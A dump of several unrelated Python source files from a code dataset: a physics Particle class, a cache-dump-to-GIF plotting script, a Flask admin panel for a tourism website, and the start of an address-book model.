MinimalTree([1,2,3,4,5,6,7],7)\nprint(tree)\nprint(ValidateBST(tree))\ntree = MinimalTree([1,3,2,4,5,6,7],7)\nprint(tree)\nprint(ValidateBST(tree))","sub_path":"Chapter-4/Exercise-4.5/ValidateBST.py","file_name":"ValidateBST.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"365976325","text":"\r\nimport math\r\nfrom position_object import Cartesian, Spherical, sumC\r\nfrom Mathematics import matrices\r\nfrom decimal import Decimal, getcontext\r\ngetcontext().prec = 40\r\nG = Decimal(Decimal(6.67408)*Decimal(10)**Decimal(-11))\r\n\r\n \r\nclass Particle:\r\n\r\n # initialization\r\n def __init__(self, mass=0, charge=0, speed=0, phi=Decimal(0),\r\n theta=Decimal(math.pi)/Decimal(2), position=Cartesian(),\r\n name='Particle', colour='black', hist=[], time=0):\r\n '''\r\n Give:\r\n mass in kilograms (kg)\r\n charge in coulombs (C)\r\n speed in metres per second (m/s)\r\n angles in radians (rad)\r\n position in metres (m)\r\n time in seconds (s)\r\n Note:\r\n phi represents the counter-clockwise angle from the x-axis\r\n theta represents the angle below the positive z-axis\r\n These angles represent the direction of velocity\r\n '''\r\n \r\n #eliminating inappropriate types\r\n if type(mass)==bool or type(charge)==bool or type(speed)==bool \\\r\n or type(phi)==bool or type(theta)==bool or type(time)==bool:\r\n raise TypeError('properties must have real number values')\r\n if type(name) != str:\r\n raise TypeError('name must be a string')\r\n if type(colour) != str:\r\n raise TypeError('colour must be a string')\r\n if type(hist) != list and type(hist) != tuple:\r\n raise TypeError('history must contain ordered iterable')\r\n elif len(hist) >= 1:\r\n for i in range(len(hist)):\r\n if len(hist[i]) != 9:\r\n if i==len(hist)-1:\r\n if len(hist[i])==1 and type(hist[i][0])==Particle:\r\n pass\r\n elif len(hist[i])==2 and type(hist[i][0])==Particle \\\r\n and type(hist[i][1])==Particle:\r\n pass\r\n else:\r\n raise ValueError('origin of Particle can have no more\\\r\nthan two references')\r\n else:\r\n raise ValueError('history records must contain 9 items')\r\n \r\n\r\n #obtaining position\r\n if type(position)==Cartesian:\r\n self.s = position\r\n elif type(position) == tuple or type(position) == list or \\\r\n type(position) == Spherical:\r\n self.s = Cartesian(position)\r\n else:\r\n raise TypeError('position must be given as Cartesian, Spherical, \\\r\n tuple, or list')\r\n\r\n #eliminating non-real values\r\n try:\r\n mass = Decimal(mass)\r\n charge = Decimal(charge)\r\n speed = Decimal(speed)\r\n phi = Decimal(phi)\r\n theta = Decimal(theta)\r\n time = Decimal(time)\r\n except (ValueError, TypeError):\r\n raise TypeError ('input must be a real number value')\r\n\r\n #eliminating inappropriate values\r\n if mass < 0:\r\n raise ValueError ('mass cannot be negative')\r\n if speed < 0:\r\n tmp = Spherical(speed, theta, phi)\r\n speed = tmp.rad\r\n theta = tmp.theta\r\n phi = tmp.phi\r\n\r\n #initializing instances\r\n self.m = mass\r\n self.q = charge\r\n self.v = speed\r\n self.phi = phi\r\n self.theta = theta\r\n self.name = name\r\n self.col = colour\r\n self.hist = hist\r\n self.t = time\r\n return\r\n\r\n # comparison\r\n def __eq__(self, other):\r\n '''\r\n Returns True if equality holds for mass, charge, velocity, and time'''\r\n return self.m == other.m and self.q == other.q and self.v == other.v \\\r\n and self.phi == other.phi and self.theta == other.theta and \\\r\n self.t == other.t\r\n def __ne__(self, other):\r\n '''\r\n Returns False if equality holds for mass, charge, velocity, and time'''\r\n return not(self==other)\r\n def __ge__(self, other):\r\n ''' Not supported '''\r\n raise TypeError ('unorderable types: Particle() >= Particle()')\r\n def __gt__(self, other):\r\n ''' Not supported '''\r\n raise TypeError ('unorderable types: Particle() > Particle()')\r\n def __le__(self, other):\r\n ''' Not supported '''\r\n raise TypeError ('unorderable types: Particle() <= Particle()')\r\n def __lt__(self, other):\r\n ''' Not supported '''\r\n raise TypeError ('unorderable types: Particle() < Particle()')\r\n\r\n # representation\r\n def __repr__(self):\r\n '''Returns repr(self)'''\r\n return 'Particle('+str(self.m)+', '+str(self.q)+', '+str(self.v)+\\\r\n ', '+str(self.phi)+', '+str(self.theta)+', '+repr(self.s)+\\\r\n ', '+self.name+', '+self.col+', '+str(self.hist)+', '\\\r\n +str(self.t)+')'\r\n def __str__(self):\r\n '''Return str(self)'''\r\n tmp = self.name+': \\n ' + \\\r\n '\\t mass = ' + str(round(self.m, 4)) + ' kg \\n ' + \\\r\n '\\t charge = ' + str(round(self.q, 4)) + ' C \\n ' + \\\r\n '\\t velocity = ' + str(round(self.v, 4)) + ' m/s [' + \\\r\n str(round(90-math.degrees(self.theta), 4)) + \\\r\n '\\u00B0 UP, ' + str(round(math.degrees(self.phi), 4)) + '\\u00B0 RIGHT] \\n' + \\\r\n '\\t position = ' + str(round(self.s, 4)) + ' m'\r\n return tmp\r\n\r\n # copying\r\n def alias(self):\r\n '''\r\n (Particle) -> Particle\r\n '''\r\n return self\r\n def clone(self):\r\n '''\r\n (Particle) -> Particle\r\n '''\r\n return Particle(self.m, self.q, self.v, self.phi, self.theta, self.s, \\\r\n self.name, self.col, matrices.clone(self.hist), self.t)\r\n\r\n # arithmetic\r\n def __mul__(self, value):\r\n ''' Not supported '''\r\n raise TypeError ('Particle does not support multiplication')\r\n def __rmul__(self, value):\r\n ''' Not supported '''\r\n raise TypeError ('Particle does not support multiplication')\r\n def __truediv__(self, value):\r\n ''' Not supported '''\r\n raise TypeError ('Particle does not support division')\r\n def __floordiv__(self, value):\r\n ''' Not supported '''\r\n raise TypeError ('Particle does not support division')\r\n def __mod__(self, value):\r\n ''' Not supported '''\r\n raise TypeError ('Particle does not support division')\r\n def __pos__(self):\r\n ''' Not supported '''\r\n raise TypeError ('Particle does not support a sign convention')\r\n def __neg__(self):\r\n ''' Not supported '''\r\n raise TypeError ('Particle does not support a sign convention')\r\n def __abs__(self):\r\n ''' Not supported '''\r\n raise TypeError ('Particle does not support a magnitude')\r\n def __add__(self, other, name='Particle', colour='black'):\r\n '''\r\n Combines two particles into one\r\n (Particle, Particle, str, str) -> Particle\r\n Note: this is equivalent to a completely inelastic collision of the two\r\n Particles\r\n '''\r\n if self.s != other.s or self.t != other.t:\r\n raise ValueError('Particles must occupy the same position \\\r\nat the same time to collide')\r\n vs = Spherical(self.v, self.theta, self.phi)\r\n vo = Spherical(other.v, other.theta, other.phi)\r\n vn = (self.m*vs + other.m*vo)/(self.m + other.m)\r\n new=Particle(self.m+other.m, self.q+other.q, vn.rad, vn.phi, vn.theta, \\\r\n self.s, name, colour, [[self, other]], self.t)\r\n return new\r\n def __sub__(self, other, name='Particle', colour='black'):\r\n '''\r\n Facilitates explosion of self; explosion fragment other is given,\r\n second fragment is returned\r\n (Particle, Particle, str, str) -> Particle\r\n '''\r\n if self.s != other.s or self.t != other.t:\r\n raise ValueError('Particles must occupy the same position \\\r\nat the same time to explode')\r\n if other.hist == []:\r\n other.hist = [[self]]\r\n elif other.hist == [[self]]:\r\n pass\r\n else:\r\n raise ValueError('given explosion fragment must not have history')\r\n vs = Spherical(self.v, self.theta, self.phi)\r\n vo = Spherical(other.v, other.theta, other.phi)\r\n vn = (self.m*vs - other.m*vo)/(self.m - other.m)\r\n new=Particle(self.m-other.m, self.q-other.q, vn.rad, vn.phi, vn.theta, \\\r\n self.s, name, colour, [[self]], self.t)\r\n return new\r\n def __round__(self, digits=12):\r\n '''\r\n Rounds all numeric parameters to digits decimal places\r\n (Particle) -> None\r\n '''\r\n self.m = round(self.m, digits)\r\n self.q = round(self.q, digits)\r\n self.v = round(self.v, digits)\r\n self.phi = round(self.phi, digits)\r\n self.theta = round(self.theta, digits)\r\n self.s = round(self.s, digits)\r\n return\r\n\r\n # actions\r\n def d_mass(self, dm):\r\n '''\r\n Changes mass of Particle self by dm\r\n (Particle, num) -> None\r\n '''\r\n if self.m + dm <= 0:\r\n raise ValueError('mass cannot have negative value')\r\n self.m = self.m + dm\r\n return\r\n def d_charge(self, dq):\r\n '''\r\n Changes charge of Particle self by dq\r\n (Particle, num) -> None\r\n '''\r\n self.q = self.q + dq\r\n return\r\n def d_velocity(self, dv):\r\n '''\r\n (Particle, Spherical) -> None\r\n '''\r\n vn = Spherical(self.v, self.theta, self.phi) + dv\r\n self.v = vn.rad\r\n self.theta = vn.theta\r\n self.phi = vn.phi\r\n return\r\n def displace(self, ds):\r\n '''\r\n Moves Particle self by differentials dx, dy, dz\r\n (Particle, Cartesian) -> None\r\n '''\r\n self.s = self.s + ds\r\n return\r\n def d_time(self, dt):\r\n '''\r\n Increments time by dt\r\n (Particle, num) -> None\r\n '''\r\n if dt <= 0:\r\n raise ValueError('time cannot go backwards')\r\n self.t = self.t + dt\r\n return\r\n def rec_state(self):\r\n '''\r\n Records current state in history\r\n (Particle) -> None\r\n '''\r\n self.hist.append([self.t, self.m, self.q, self.v, self.phi, self.theta, \\\r\n self.s, self.name, self.col])\r\n return\r\n\r\n # properties\r\n def distance(self, other=Cartesian()):\r\n '''\r\n Returns distance between Particles self and other; if other is not given,\r\n returns distance to origin\r\n (Particle, Particle) -> num\r\n (Particle, Cartesian) -> num\r\n '''\r\n if type(other) == Cartesian:\r\n return (self.s - other).radius()\r\n elif type(other) == Particle:\r\n return (self.s - other.s).radius()\r\n else:\r\n raise TypeError('second argument, if given, must be Particle or \\\r\nCartesian')\r\n return\r\n\r\n # forces\r\n def grav_f(self, other):\r\n '''\r\n Returns gravitational force vector on self as a result of other\r\n (Particle, Particle) -> Cartesian\r\n '''\r\n if type(other) != Particle:\r\n raise TypeError('other must be an object of type Particle')\r\n r = other.s - self.s\r\n F = (G * self.m * other.m / (r.radius())**2) * r.unit()\r\n return F\r\n def elec_f(self, other):\r\n raise Exception('electric force computations not available')\r\n def accel(self, Fs):\r\n '''\r\n Returns instantaneous acceleration vector of self as a result of forces\r\n in list Fs\r\n (Particle, list) -> Cartesian\r\n Preconditions: list Fs must contain Cartesians (force vectors)\r\n '''\r\n Fnet = sumC(Fs)\r\n a = Fnet / self.m\r\n return a\r\n\r\n\r\n\r\n \r\n \r\n","sub_path":"System Object/body_object.py","file_name":"body_object.py","file_ext":"py","file_size_in_byte":11867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"228107957","text":"from collections import defaultdict, Counter\nimport csv\nimport matplotlib.pyplot as plt\nimport os\nfrom shutil import rmtree\nimport sys\nfrom tqdm import tqdm\n\niterations = int(sys.argv[1])\nSCRATCHSPACE_DIR = \"/tmp/dumpcache/\"\nXKCD_STYLE_PLOTS = False # I thought this was fun\n\nprint(\"Processing CSV files into GIF\")\nfor filename_index in tqdm(range(iterations)):\n with open(SCRATCHSPACE_DIR + '/cachedump{}.csv'.format(filename_index)) as csvfile:\n fieldnames = ['cache_set_idx', 'cache_line_idx', 'pid', 'data[0]', 'data[1]', 'data[2]', 'data[3]', 'data[4]', 'data[5]',\n 'data[6]', 'data[7]', 'data[8]', 'data[9]', 'data[10]', 'data[11]', 'data[12]', 'data[13]', 'data[14]', 'data[15]']\n columns = defaultdict(list)\n extracted_fieldnames = ['pid']\n reader = csv.DictReader(csvfile, fieldnames=fieldnames) # read rows into a dictionary format\n for row in reader: # read a row as {column1: value1, column2: value2,...}\n for (k,v) in row.items(): # go over each column name and value \n if k in extracted_fieldnames: # only concerned with the fieldnames in extracted_fieldnames\n columns[k].append(v) \n\n pid_list = columns['pid']\n c = Counter(pid_list)\n c = sorted(c.items())\n pid_counts = [i[0] for i in c]\n pids = [i[0] for i in c]\n freq = [i[1] for i in c]\n\n if XKCD_STYLE_PLOTS:\n plt.xkcd()\n \n f, ax = plt.subplots()\n\n bar_lst = plt.bar(pids, freq)\n ax.annotate(\"Snapshot {}\".format(filename_index), textcoords='figure fraction', xy=(0.90, 0.97), xytext=(0.90, 0.97), va='top', ha='center', fontsize=10)\n plt.title(\"Cachelines per PID\")\n plt.xlabel(\"PID / Percentage of Cachelines\", labelpad=35)\n plt.ylabel(\"Number of Cachelines\")\n ax.set_xticklabels(pids, fontsize=8, rotation='vertical')\n\n for bar, pid in zip(bar_lst, pids):\n bar.set_color(\"#\" + \"{:x}\".format((int((pid.strip().strip(\"-\"))) * 100000) % 16777215).zfill(6))\n bar.set_edgecolor(\"black\")\n bar.set_linewidth(2)\n\n # Label the percentages below the x-axis...\n for x, count in enumerate(freq):\n # Label the percentages\n percent = '{:.1f}%'.format(100 * float(count) / sum(freq))\n ax.annotate(percent, xy=(x, 0), xycoords=('data', 'axes fraction'),\n xytext=(0, -35), textcoords='offset points', va='top', ha='center', fontsize=8, rotation='vertical')\n\n plt.tight_layout()\n plt.savefig(SCRATCHSPACE_DIR + 'graphic{}.png'.format(filename_index, bbox_inches='tight'))\n plt.close()\n\nimg_list = []\nfor filename in os.listdir(SCRATCHSPACE_DIR):\n if filename.endswith('.png'):\n img_list.append(SCRATCHSPACE_DIR + filename)\n\nimg_list.sort(key=lambda x: int(''.join(filter(str.isdigit, x))))\nos.system('convert -loop 0 -delay 75 %s graphic.gif' % ' '.join(img_list))\n\n# Clean up png and csv files\nrmtree(SCRATCHSPACE_DIR)\n","sub_path":"dump_cache_to_gif/generate_graphic.py","file_name":"generate_graphic.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"633994153","text":"from functools import wraps\nfrom sqlalchemy import or_, and_\nfrom . import admin\nfrom app.admin.forms import LoginForm, ScenicForm, AreaForm, TravelsForm\nfrom flask import render_template, redirect, url_for, session, request, flash, current_app, make_response\nfrom app.models import Admin, AdminLog, Area, Scenic, Oplog, Travels, User, Suggestion, UserLog\nfrom app import db\nfrom werkzeug.utils import secure_filename\nfrom random import random\nimport os\n\n\ndef admin_login(f):\n \"\"\"登录装饰器\n\n Args:\n\n Returns:\n\n Raise:\n\n \"\"\"\n @wraps(f)\n def decorated_function(*args, **kwargs):\n if \"admin_id\" not in session:\n flash(\"请先登录\", \"error\")\n return redirect(url_for(\"admin.login\"))\n return f(*args, **kwargs)\n\n return decorated_function\n\n\n@admin.route(\"login\", methods=[\"POST\", \"GET\"])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n data = form.data\n account = data[\"account\"]\n password = data[\"password\"]\n admin = Admin.query.filter_by(account=account).first()\n if admin.check_password_hash(password):\n session[\"admin\"] = admin.account\n session[\"admin_id\"] = admin.id\n adminlog = AdminLog(admin_id=admin.id,\n ip=request.remote_addr)\n db.session.add(adminlog)\n db.session.commit()\n return redirect(url_for(\"admin.index\"))\n return render_template(\"admin/login.html\", form=form)\n\n\n@admin.route(\"/index\", methods=[\"GET\"])\n@admin_login\ndef index():\n return render_template(\"admin/index.html\", admin=session[\"admin\"])\n\n\n@admin.route(\"scenic/add\", methods=[\"POST\", \"GET\"])\n@admin_login\ndef scenic_add():\n \"\"\"添加景区页面\n\n Args:\n\n Returns:\n\n Raise:\n\n \"\"\"\n form = ScenicForm()\n form.area_id.choices = [(v.id, v.name) for v in Area.query.all()]\n if form.validate_on_submit():\n data = form.data\n scenic_count = Scenic.query.filter_by(title=data[\"title\"]).count()\n if scenic_count == 1:\n flash(\"景点已存在!\", \"err\")\n return redirect(url_for(\"admin.scenic_add\"))\n # 生成唯一的文件名称\n file_logo = secure_filename(form.logo.data.filename)\n\n if not os.path.exists(current_app.config[\"UP_DIR\"]):\n os.makedirs(current_app.config[\"UP_DIR\"])\n os.chmod(current_app.config[\"UP_DIR\"], \"rw\")\n # logo = change_filename(file_logo)\n logo = file_logo\n form.logo.data.save(current_app.config[\"UP_DIR\"] + logo)\n scenic = Scenic(\n title=data[\"title\"],\n logo=logo,\n star=int(data[\"star\"]),\n address=data[\"address\"],\n is_hot=int(data[\"is_hot\"]),\n is_recommended=int(data[\"is_recommended\"]),\n introduction=data[\"introduction\"],\n content=data[\"content\"],\n area_id=data[\"area_id\"]\n )\n db.session.add(scenic)\n db.session.commit()\n flash(\"添加成功!\", \"ok\")\n return redirect(url_for(\"admin.scenic_add\" ))\n return render_template(\"admin/scenic_add.html\", form=form)\n\n\n@admin.route(\"/scenic/list\", methods=[\"POST\", \"GET\"])\n@admin_login\ndef scenic_list():\n title = request.args.get(\"title\", \"\", type=str)\n page = request.args.get(\"page\", 1, type=int)\n if title:\n page_data = Scenic.query.filter_by(title=title).order_by(\n Scenic.add_time.desc()\n ).paginate(page=page, per_page=5)\n else:\n page_data = Scenic.query.order_by(\n Scenic.add_time.desc()\n ).paginate(page=page, per_page=5)\n return render_template(\"admin/scenic_list.html\", page_data=page_data)\n\n\n@admin.route(\"/scenic/edit/\", methods=[\"POST\", \"GET\"])\n@admin_login\ndef scenic_edit(id=None):\n form = ScenicForm()\n form.area_id.choices = [(v.id, v.name) for v in Area.query.all()]\n form.submit.label.text = \"修改\"\n form.logo.validators = []\n scenic = Scenic.query.get_or_404(int(id))\n if request.method == \"GET\":\n form.is_recommended.data =scenic.is_recommended\n form.is_hot.data = scenic.is_hot\n form.area_id.data = scenic.area_id\n form.star.data = scenic.star\n form.content.data = scenic.content\n form.introduction.data = scenic.introduction\n form.title.data = scenic.title\n form.address.data = scenic.address\n if form.validate_on_submit():\n data = form.data\n scenic_count = Scenic.query.filter_by(title=data[\"title\"]).count()\n\n if scenic_count == 1 and scenic.title != data[\"title\"]:\n flash(\"景点已存在!\", \"err\")\n return redirect(url_for(\"admin.scenic_edit\", id=id))\n if not os.path.exists(current_app.config[\"UP_DIR\"]):\n os.makedirs(current_app.config[\"UP_DIR\"])\n os.chmod(current_app.config[\"UP_DIR\"], \"rw\")\n if form.logo.data != \"\":\n file_logo = secure_filename(form.logo.data.filename)\n scenic.logo = file_logo\n form.logo.data.save(current_app.config[\"UP_DIR\"] + scenic.logo)\n\n scenic.title = data[\"title\"]\n scenic.address = data[\"address\"]\n scenic.area_id = data[\"area_id\"]\n scenic.star = int(data[\"star\"])\n scenic.is_hot = int(data[\"is_hot\"])\n scenic.is_recommended = int(data[\"is_recommended\"])\n scenic.introduction = data[\"introduction\"]\n scenic.content = data[\"content\"]\n\n db.session.add(scenic)\n db.session.commit()\n flash(\"修改景区成功!\", \"ok\")\n addOplog(\"修改景区\" + scenic.title)\n return redirect(url_for(\"admin.scenic_edit\", id=id))\n return render_template(\"admin/scenic_edit.html\", form=form, scenic=scenic)\n\n\n@admin.route(\"/scenic/del/\", methods=[\"GET\"])\n@admin_login\ndef scenic_del(id=None):\n scenic = Scenic.query.get_or_404(id)\n db.session.delete(scenic)\n db.session.commit()\n flash(\"景区删除成功\", \"ok\")\n addOplog(\"删除景区\" + scenic.title)\n return redirect(url_for(\"admin.scenic_list\", page=1))\n\n\n@admin.route(\"/ckupload\", methods=[\"POST\", \"OPTIONS\"])\n# @admin.login\ndef ckupload():\n error = \"\"\n url = \"\"\n callback = request.args.get(\"CKEditorFuncNum\")\n\n if request.method == \"POST\" and \"upload\" in request.files:\n fileobj = request.files[\"upload\"]\n fname, fext = os.path.splitext(fileobj.filename)\n rnd_name = \"{}{}\".format(random(1000000), fext)\n\n filepath = os.path.join(current_app.static_folder, \"uploads/ckeditor\", rnd_name)\n print(filepath)\n dirname = os.path.dirname(filepath)\n if not os.path.exists(dirname):\n try:\n os.makedirs((dirname))\n except:\n error = \"ERROR_CREATE_DIR\"\n elif not os.access(dirname, os.W_OK):\n error = \"ERROR_DIR_NOT_WRITEABLE\"\n\n if not error:\n fileobj.save(filepath)\n url = url_for(\"static\", filename=\"{}{}\".format(\"uploads/ckeditor\", rnd_name))\n else:\n error = \"post error\"\n\n res = \"\"\"\"\"\".format(callback, url, error)\n\n response = make_response(res)\n response.headers[\"Content-Type\"] = \"text/html\"\n return response\n\n\n@admin.route(\"/area/add\", methods=[\"GET\", \"POST\"])\n@admin_login\ndef area_add():\n form = AreaForm()\n if form.validate_on_submit():\n data = form.data\n area = Area.query.filter_by(name=data[\"name\"]).count()\n if area == 1:\n flash(\"地区已存在\", \"error\")\n return redirect(url_for(\"admin.area_add\"))\n area = Area(\n name=data[\"name\"],\n is_recommended=data[\"is_recommended\"],\n introduction=data[\"introduction\"]\n )\n db.session.add(area)\n db.session.commit()\n addOplog(\"添加地区\" + data[\"name\"])\n flash(\"地区添加成功\", \"ok\")\n return redirect(url_for(\"admin.area_add\"))\n return render_template(\"admin/area_add.html\", form=form)\n\n\n@admin.route(\"/area/del\", methods=[\"GET\"])\n@admin_login\ndef area_del(id=None):\n area = Area.query.filter_by(id=id).first_or_404()\n db.session.delete(area)\n db.session.commit()\n addOplog(\"删除地区\" +area.name)\n flash(\"地区<<{0}>>删除成功\".format(area.name), \"ok\")\n return redirect(url_for(\"admin.area_list\"))\n\n\n@admin.route(\"/area/list\", methods=[\"GET\"])\n@admin_login\ndef area_list():\n name = request.args.get(\"name\", type=str)\n page = request.args.get(\"page\", 1, type=int)\n if name:\n page_data = Area.query.filter_by(name=name).order_by(\n Area.add_time.desc()\n ).paginate(page=page, per_page=5)\n else:\n page_data = Area.query.order_by(\n Area.add_time.desc()\n ).paginate(page=page, per_page=5)\n return render_template(\"admin/area_list.html\", page_data=page_data)\n\n\n@admin.route(\"/area/edit/\", methods=[\"POST\", \"GET\"])\n@admin_login\ndef area_edit(id=None):\n form = AreaForm()\n form.submit.label.text = \"修改\"\n area = Area.query.get_or_404(int(id))\n if request.method == \"GET\":\n form.name.data = area.name\n form.is_recommended.data = area.is_recommended\n form.introduction.data = area.introduction\n if form.validate_on_submit():\n data = form.data\n area_count = Area.query.filter_by(name=data[\"name\"]).count()\n if area_count == 1 and area.name != data[\"name\"]:\n flash(\"地区已存在!\", \"error\")\n return redirect(url_for(\"admin.area_edit\", id=id))\n area.name = data[\"name\"]\n area.is_recommended = data[\"is_recommended\"]\n area.introduction = data[\"introduction\"]\n db.session.add(area)\n db.session.commit()\n flash(\"修改地区成功!\", \"ok\")\n addOplog(\"修改地区\" + str(area.name))\n return redirect(url_for(\"admin.area_edit\", id=id))\n return render_template(\"admin/area_edit.html\", form=form, area=area)\n\n\n@admin.route(\"/travels/add\", methods=[\"POST\", \"GET\"])\n@admin_login\ndef travels_add():\n form = TravelsForm()\n form.scenic_id.choices = [(v.id, v.title) for v in Scenic.query.all()]\n if form.validate_on_submit():\n data = form.data\n travels_count = Travels.query.filter_by(title=data[\"title\"]).count()\n if travels_count == 1:\n flash(\"景点已存在!\", \"err\")\n return redirect(url_for(\"admin.travels_add\"))\n travels = Travels(\n title=data[\"title\"],\n author=data[\"author\"],\n scenic_id=data[\"scenic_id\"],\n content=data[\"content\"],\n )\n db.session.add(travels)\n db.session.commit()\n addOplog(\"添加游记\" + data[\"title\"])\n flash(\"添加游记成功\", \"ok\")\n return redirect(url_for(\"admin.travels_add\"))\n return render_template(\"admin/travels_add.html\", form=form)\n\n\n@admin.route(\"/travels/list\", methods=[\"GET\"])\n@admin_login\ndef travels_list():\n keywords = request.args.get(\"keywords\", \"\", type=str)\n page = request.args.get(\"page\", 1, type=int)\n if keywords:\n page_data = Travels.query.filter(Travels.title.like(\"%\"+keywords+\"%\")).order_by(\n Travels.add_time.desc()\n ).paginate(page=page, per_page=5)\n else:\n page_data = Travels.query.order_by(\n Travels.add_time.desc()\n ).paginate(page=page, per_page=5)\n return render_template(\"admin/travels_list.html\", page_data=page_data)\n\n\n@admin.route(\"/travels/edit/\", methods=[\"POST\", \"GET\"])\n@admin_login\ndef travels_edit(id=None):\n form = TravelsForm()\n form.scenic_id.choices = [(v.id, v.title) for v in Scenic.query.all()]\n form.submit.label.text = \"修改\"\n travels = Travels.query.get_or_404(int(id))\n if request.method == \"GET\":\n form.content.data = travels.content\n form.author.data = travels.author\n form.title.data = travels.title\n if form.validate_on_submit():\n data = form.data\n travels_count = Travels.query.filter_by(title=data[\"title\"]).count()\n if travels_count == 1 and travels.title != data[\"title\"]:\n flash(\"游记已存在!\", \"error\")\n return redirect(url_for(\"admin.travels_edit\", id=id))\n travels.title = data[\"title\"]\n travels.content = data[\"content\"]\n travels.author = data[\"author\"]\n db.session.add(travels)\n db.session.commit()\n flash(\"修改景区成功!\", \"ok\")\n addOplog(\"修改景区\" + travels.title)\n return redirect(url_for(\"admin.travels_edit\", id=id))\n return render_template(\"admin/travels_edit.html\", form=form, travels=travels)\n\n\n@admin.route(\"/travels/del\", methods=[\"GET\"])\n@admin_login\ndef travels_del(id=None):\n travels = Travels.query.filter_by(id=id).first_or_404()\n db.session.delete(travels)\n db.session.commit()\n addOplog(\"删除地区\" + travels.name)\n flash(\"地区<<{0}>>删除成功\".format(travels.name), \"ok\")\n return redirect(url_for(\"admin.travels_list\"))\n\n\n@admin.route(\"/user/list\", methods=[\"GET\"])\n@admin_login\ndef user_list():\n page = request.args.get(\"page\", 1, type=int)\n keyword = request.args.get(\"keyword\", \"\", type=str)\n\n if keyword:\n filters = or_(User.username == keyword, User.email == keyword)\n page_data = User.query.filter(filters).order_by(\n User.add_time.desc()\n ).paginate(page=page, per_page=5)\n else:\n page_data = User.query.order_by(\n User.add_time.desc()\n ).paginate(page=page, per_page=5)\n\n return render_template(\"admin/user_list.html\", page_data=page_data)\n\n\n@admin.route(\"/user/view/\", methods=[\"GET\"])\n@admin_login\ndef user_view(id=None):\n form_page = request.args.get(\"fp\")\n if not form_page:\n form_page = 1\n filters = and_(UserLog.user_id == User.id, User.id == id)\n user = User.query.join(UserLog).filter(filters)\n print(user)\n return render_template(\"admin/user_view.html\", user=user, form_page=form_page)\n\n\n@admin.route(\"/user/del\", methods=[\"GET\"])\n@admin_login\ndef user_del(id=None):\n user = User.query.filter_by(id=id).first_or_404()\n db.session.delete(user)\n db.session.commit()\n addOplog(\"删除地区\" + user.name)\n flash(\"地区<<{0}>>删除成功\".format(user.email), \"ok\")\n return redirect(url_for(\"admin.user_list\"))\n\n\n@admin.route(\"/suggestion_list/list\", methods=[\"GET\"])\n@admin_login\ndef suggestion_list():\n page = request.args.get(\"page\", 1, type=int)\n page_data = Suggestion.query.order_by(\n Suggestion.add_time.desc()\n ).paginate(page=page, per_page=5)\n return render_template(\"admin/suggestion.html\", page_data=page_data)\n\n\n@admin.route(\"/suggestion/del/\", methods=[\"GET\"])\n@admin_login\ndef suggestion_del(id=None):\n page = request.args.get(\"page\", 1, type=int)\n suggestion = Suggestion.query.get_or_404(int(id))\n db.session.delete(suggestion)\n db.session.commit()\n addOplog(\"删除意见建议\")\n flash(\"删除成功!\", \"ok\")\n return redirect(url_for(\"admin.suggestion_list\", page=page))\n\n\n@admin.route(\"/oplog/list\", methods=[\"GET\"])\n@admin_login\ndef oplog_list():\n page = request.args.get(\"page\", 1, type=int)\n page_data = Oplog.query.join(\n Admin\n ).filter(\n Admin.id == Oplog.admin_id,\n ).order_by(\n Oplog.add_time.desc()\n ).paginate(page=page, per_page=10)\n return render_template(\"admin/oplog_list.html\", page_data=page_data)\n\n\n@admin.route(\"/adminloginlog/list\", methods=[\"GET\"])\n@admin_login\ndef adminloginlog_list(page=None):\n page = request.args.get(\"page\", 1, type=int)\n page_data = AdminLog.query.join(\n Admin\n ).filter(\n Admin.id == AdminLog.admin_id,\n ).order_by(\n AdminLog.add_time.desc()\n ).paginate(page=page, per_page=10)\n return render_template(\"admin/adminloginlog_list.html\", page_data=page_data)\n\n\n@admin.route(\"userloginlog/list\", methods=[\"GET\"])\n@admin_login\ndef userloginlog_list(page=None):\n page = request.args.get(\"page\", 1, type=int)\n page_data = UserLog.query.join(\n User\n ).filter(\n User.id == UserLog.id\n ).order_by(\n UserLog.add_time.desc()\n ).paginate(page=page, per_page=10)\n return render_template(\"auth/userloginlog_list.html\", page_data=page_data)\n\n\ndef addOplog(reason):\n oplog = Oplog(\n admin_id=session[\"admin_id\"],\n ip=request.remote_addr,\n reason=reason\n )\n db.session.add(oplog)\n db.session.commit()\n#\n# def gen_rnd_filename():\n# return datetime.now().strftime(\"%Y%m%d%H%M%S\") + str(uuid.uuid4().hex)\n\n\n","sub_path":"Graduation2/app/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"530852657","text":"# The MIT License (MIT)\n#\n# Copyright (c) 2016 Adam York\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated\n# documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to\n# permit persons to whom the Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all copies or substantial portions of\n# the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO\n# THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF\n# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n\"\"\"\nClasses as objects.\nClasses in this module represent a person, relationship, and comment.\n\"\"\"\n\n\nclass Person(object):\n \"\"\"\n\n A person class which represents a person in the address book.\n\n Attributes:\n person_id: Person identifier (row identifier)\n first_name: First name.\n last_name: Last Name.\n middle_initial. Middle Initial.\n nick_name: Nick Name.\n date_of_birth: Date of birth in YYYY-MM-DD format.\n date_of_death: Date of death in YYYY-MM-DD format.\n relatives: A list of assigned relationship(s) to another person.\n identities: A list of associated identities (identification).\n addresses: 